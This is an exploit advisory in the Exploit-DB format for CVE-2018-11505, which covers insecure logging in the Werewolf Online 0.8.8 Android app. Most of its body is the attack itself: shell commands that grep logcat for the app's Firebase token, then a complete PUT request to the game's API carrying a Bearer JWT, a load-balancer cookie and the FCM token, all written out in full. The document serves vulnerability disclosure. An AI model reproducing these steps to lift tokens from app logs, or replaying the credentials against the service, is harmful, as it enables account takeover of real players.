56 lines
No EOL
2.9 KiB
Text
56 lines
No EOL
2.9 KiB
Text
# Exploit Title: Werewolf Online 0.8.8 - Insecure Logging
|
|
# Date: 2018-05-24
|
|
# Software Link:
|
|
https://play.google.com/store/apps/details?id=com.werewolfapps.online
|
|
# Download Link:
|
|
https://apkpure.com/werewolf-online-unreleased/com.werewolfapps.online/download?from=details
|
|
# Exploit Author: ManhNho
|
|
# Version: 0.8.8 Android App
|
|
# CVE: CVE-2018-11505
|
|
# Category: Mobile Apps
|
|
# Tested on: Android 4.4
|
|
|
|
---Description---
|
|
|
|
Many developers log information to the android log. Sometimes sensitive
|
|
data as well.
|
|
With output of logcat, Hacker can get "Firebase token" which used in PUT
|
|
request to /players/meAndCheckAppVersion
|
|
|
|
---PoC---
|
|
|
|
root@vbox86p:/ # ps | grep 'were'
|
|
u0_a72 9161 205 810364 172268 ffffffff b765ea23 S
|
|
com.werewolfapps.online
|
|
root@vbox86p:/ # logcat | grep -i '9161'
|
|
I/ActivityManager( 586): Start proc com.werewolfapps.online for activity
|
|
com.werewolfapps.online/.MainActivity: pid=9161 uid=10072 gids={50072,
|
|
3003, 1028, 1015}
|
|
I/MultiDex( 9161): VM with version 1.6.0 does not have multidex support
|
|
I/MultiDex( 9161): Installing application
|
|
...
|
|
D/RNFirebaseMessaging( 9161): Firebase token:
|
|
dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8
|
|
D/RNFirebaseAuth( 9161): getToken/getIdToken
|
|
D/RNFirebaseAuth( 9161): getToken:onComplete:success
|
|
...
|
|
|
|
Request:
|
|
|
|
PUT /players/meAndCheckAppVersion HTTP/1.1
|
|
authorization: Bearer
|
|
eyJhbGciOiJSUzI1NiIsImtpZCI6IjEyMDUwYzMxN2ExMjJlZDhlMWZlODdkN2FhZTdlMzk3OTBmNmMwYjQifQ.eyJpc3MiOiJodHRwczovL3NlY3VyZXRva2VuLmdvb2dsZS5jb20vd2VyZXdvbGYtb25saW5lLTE5MTgxMiIsImF1ZCI6IndlcmV3b2xmLW9ubGluZS0xOTE4MTIiLCJhdXRoX3RpbWUiOjE1MjcxMzU0MTUsInVzZXJfaWQiOiIzNUxUT2pGWGw4Tk1DMklURDZlc1VUdVZ0RDgyIiwic3ViIjoiMzVMVE9qRlhsOE5NQzJJVEQ2ZXNVVHVWdEQ4MiIsImlhdCI6MTUyNzEzNTQxNSwiZXhwIjoxNTI3MTM5MDE1LCJlbWFpbCI6IndlcmVAMGlscy5vcmciLCJlbWFpbF92ZXJpZmllZCI6ZmFsc2UsImZpcmViYXNlIjp7ImlkZW50aXRpZXMiOnsiZW1haWwiOlsid2VyZUAwaWxzLm9yZyJdfSwic2lnbl9pbl9wcm92aWRlciI6InBhc3N3b3JkIn19.dRcMrVgnOI0VlVMTinv_UitmNZ3Lx6MxWQkPbxrLtj4xNI-5TmqL-oMHA3M4wWxt6gCtvNl9aO10WzhHHaN5wSJ7cnuUkEJGNUmA5PUcQTR7-NJ8i28C_x7fkqbQYqr0LFJSNxfa3BNb6B8qRNPmNjf_k3KoarRtp2eIxXbY_2Zf9S9-E8qBeyMM5waBrc3KHhxP8fIkxmDQOcTi83YioD0B9lmb8pqzu2kHARhySDIRLxHehujSMbOBnwEdSWNdYXv3G0r9SSJqREjyjv-xYqMzmDYElQ71LcanaoKeHmyyEDnuKyctkyvOOKUARV5QF1eMvvS2jQXlHQUIr2slHw
|
|
Content-Type: application/json; charset=utf-8
|
|
Content-Length: 207
|
|
Host: api-core.werewolf-apps.com
|
|
Connection: close
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie:
|
|
AWSELB=896D69710664CD95B9C2256646A1D3D31F91AA414E0FCA5064E93F2745A17C7AAAF7C2EDA090955CDC20408E213D8C06ACC71A484F0BB3CDD1FB3D4FADD3439C18EF311AB3
|
|
User-Agent: okhttp/3.6.0
|
|
|
|
{"versionNumber":48,"platform":"android","fcmToken":"dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8"}
|
|
|
|
---References---
|
|
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11505
|
|
https://pastebin.com/NtPn3jB8 |